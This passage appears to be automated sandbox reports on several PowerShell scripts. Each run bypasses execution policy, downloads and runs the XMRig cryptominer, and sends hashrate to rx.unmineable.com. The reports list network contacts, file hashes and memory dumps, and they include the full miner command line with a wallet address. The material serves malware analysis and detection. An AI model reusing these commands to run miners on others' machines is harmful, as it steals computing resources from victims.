US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/116-0-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scxgnupe.dxb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/116-10-0x000001B968430000-0x000001B968452000-memory.dmp

memory/116-11-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-12-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-15-0x000001B9684C0000-0x000001B9684D2000-memory.dmp

memory/116-16-0x000001B9684B0000-0x000001B9684BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3380-47-0x0000022A62F40000-0x0000022A62F60000-memory.dmp

memory/3380-48-0x0000022A62F90000-0x0000022A62FB0000-memory.dmp

memory/3380-49-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/116-50-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

memory/3380-51-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/116-52-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/3380-54-0x0000022A64880000-0x0000022A648A0000-memory.dmp

memory/3380-53-0x0000022A62FB0000-0x0000022A62FD0000-memory.dmp

memory/116-55-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/3380-56-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-58-0x0000022A62FB0000-0x0000022A62FD0000-memory.dmp

memory/3380-57-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-59-0x0000022A64880000-0x0000022A648A0000-memory.dmp

memory/3380-60-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-61-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-62-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-63-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-64-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-65-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-66-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-67-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-68-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-69-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-70-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-71-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-72-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-73-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-74-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-75-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-76-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-77-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-78-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-79-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-80-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-81-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-82-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-83-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-84-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-85-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-86-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-87-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-88-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-89-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-90-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-91-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-92-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-93-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-94-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-95-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-96-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-97-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-98-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-99-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-100-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-101-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-102-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-103-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-104-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-105-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-106-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-107-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-108-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-109-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-110-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-111-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-112-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-113-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-114-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-115-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-116-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-117-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-118-0x00007FF673B40000-0x00007FF674773000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/216-0-0x00007FFE83653000-0x00007FFE83655000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sm0a33ck.dff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/216-10-0x000002B5AC0F0000-0x000002B5AC112000-memory.dmp

memory/216-11-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-12-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-14-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-15-0x000002B5C44A0000-0x000002B5C44B2000-memory.dmp

memory/216-16-0x000002B5C4480000-0x000002B5C448A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3444-47-0x0000020BE3C60000-0x0000020BE3C80000-memory.dmp

memory/3444-48-0x0000020BE3CB0000-0x0000020BE3CD0000-memory.dmp

memory/3444-49-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-50-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-54-0x0000020BE3DF0000-0x0000020BE3E10000-memory.dmp

memory/3444-53-0x0000020BE3DD0000-0x0000020BE3DF0000-memory.dmp

memory/216-52-0x00007FFE83653000-0x00007FFE83655000-memory.dmp

memory/3444-51-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-55-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-56-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-57-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-58-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-59-0x0000020BE3DD0000-0x0000020BE3DF0000-memory.dmp

memory/3444-60-0x0000020BE3DF0000-0x0000020BE3E10000-memory.dmp

memory/3444-61-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-62-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-63-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-64-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-65-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-66-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-67-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-68-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-69-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-70-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-71-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-72-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-73-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-74-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-75-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-76-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-77-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-78-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-79-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-80-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-81-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-82-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-83-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-84-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-85-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-86-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-87-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-88-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-89-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-90-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-91-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-92-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-93-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-94-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-95-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-96-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-97-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-98-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-99-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-100-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-101-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-102-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-103-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-104-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-105-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-106-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-107-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-108-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-109-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-110-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-111-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-112-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-113-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-114-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-115-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-116-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-117-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-118-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-119-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:47

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3988-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/3988-5-0x000002B128BF0000-0x000002B128C12000-memory.dmp

memory/3988-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-9-0x000002B141210000-0x000002B141286000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsqsuv34.lw1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3988-10-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-48-0x000002B141290000-0x000002B1412A2000-memory.dmp

memory/3988-61-0x000002B128C20000-0x000002B128C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4760-90-0x000001D093610000-0x000001D093630000-memory.dmp

memory/4760-91-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-92-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/3988-93-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/3988-94-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4760-95-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-96-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-97-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-98-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-99-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-100-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-101-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-102-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-103-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-104-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-105-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-106-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-107-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-108-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-109-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-110-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-111-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-112-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-113-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-114-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-115-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-116-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-117-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-118-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-119-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-120-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-121-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-122-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-123-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-124-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-125-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-126-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-127-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-128-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-129-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-130-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-131-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-132-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-133-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-134-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-135-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-136-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-137-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-138-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

